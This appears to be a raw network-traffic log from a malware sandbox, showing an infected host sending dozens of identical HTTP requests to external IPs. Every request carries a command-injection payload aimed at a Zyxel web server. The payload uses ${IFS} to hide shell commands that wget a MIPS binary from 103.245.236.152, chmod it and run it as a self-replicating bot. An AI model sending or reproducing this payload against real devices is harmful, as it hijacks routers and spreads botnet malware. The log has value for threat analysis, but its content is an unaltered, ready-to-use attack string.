                                        Jan 14, 2024 16:18:47.517987013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4976192.168.2.134182051.152.21.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.518053055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4977192.168.2.1355206184.209.205.148443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.518085957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4978192.168.2.133425879.13.43.30443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.518129110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4979192.168.2.134453835.99.207.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.518166065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4980192.168.2.134242699.179.165.97443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.518196106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4981192.168.2.1348552126.35.177.170443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.518225908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4982192.168.2.134181888.102.207.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.518271923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4983192.168.2.1340086151.234.121.71443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.518341064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4984192.168.2.134608249.133.2.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.518357992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4985192.168.2.1356084118.99.13.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.518407106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4986192.168.2.135731677.109.152.176443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.518467903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4987192.168.2.1339826149.58.26.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.518512964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4988192.168.2.1345254168.24.1.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.518562078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4989192.168.2.1353356169.66.181.68443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.518600941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4990192.168.2.1352756212.75.190.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.518642902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4991192.168.2.1344432151.176.78.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.518676996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4992192.168.2.135016044.175.88.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.518712997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4993192.168.2.1344462107.132.112.105443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.518744946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4994192.168.2.1336600173.195.87.214443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.518791914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4995192.168.2.1347642161.197.23.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.518826962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4996192.168.2.1339918179.244.160.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.518856049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4997192.168.2.1360462164.106.118.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.518915892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4998192.168.2.135410646.160.185.108443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.518949032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4999192.168.2.134640271.192.115.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.518995047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5000192.168.2.1343968143.173.122.102443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.519036055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5001192.168.2.1347876162.238.40.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.519072056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5002192.168.2.134693452.17.211.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.519123077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5003192.168.2.1345514191.32.94.212443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.519176006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5004192.168.2.136047238.5.243.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.519213915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5005192.168.2.1350980186.225.179.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.519264936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5006192.168.2.1357850191.43.247.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.519299984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5007192.168.2.133376618.1.57.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.519347906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5008192.168.2.134533684.224.41.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.519393921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5009192.168.2.1352620170.50.241.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.519431114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5010192.168.2.135458452.106.23.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.519458055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5011192.168.2.1338134175.196.232.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.519522905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5012192.168.2.1351318105.3.217.97443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.519568920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5013192.168.2.135373614.94.7.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.519593000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5014192.168.2.1359508142.235.239.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.519624949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5015192.168.2.135064280.109.202.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.519668102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5016192.168.2.1352340150.214.90.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.519705057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5017192.168.2.133343047.210.193.110443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.519735098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5018192.168.2.1352824123.39.109.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.519764900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5019192.168.2.1340974162.5.33.26443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.519826889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5020192.168.2.1356072204.175.112.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.519850969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5021192.168.2.135378890.137.68.60443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.519886971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5022192.168.2.1334016108.209.162.227443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.519934893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5023192.168.2.1346110102.103.127.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.519965887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5024192.168.2.13380601.181.34.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.520003080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5025192.168.2.134711471.211.200.151443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.520025969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5026192.168.2.1346648186.79.100.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.520085096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5027192.168.2.133282474.211.143.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.520109892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5028192.168.2.13395569.79.156.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.520145893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5029192.168.2.1360054176.2.20.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.520179033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5030192.168.2.1339248114.191.121.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.520246029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5031192.168.2.1355320119.191.120.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.520277023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5032192.168.2.134495868.212.151.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.520299911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5033192.168.2.1346650141.17.26.68443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.520364046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5034192.168.2.1358956147.207.60.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.520378113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5035192.168.2.1343240173.72.176.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.520407915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5036192.168.2.1354322149.255.66.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.520456076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5037192.168.2.135362672.182.192.249443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.520483971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5038192.168.2.135235274.97.11.246443
                                        TimestampBytes transferredDirectionData
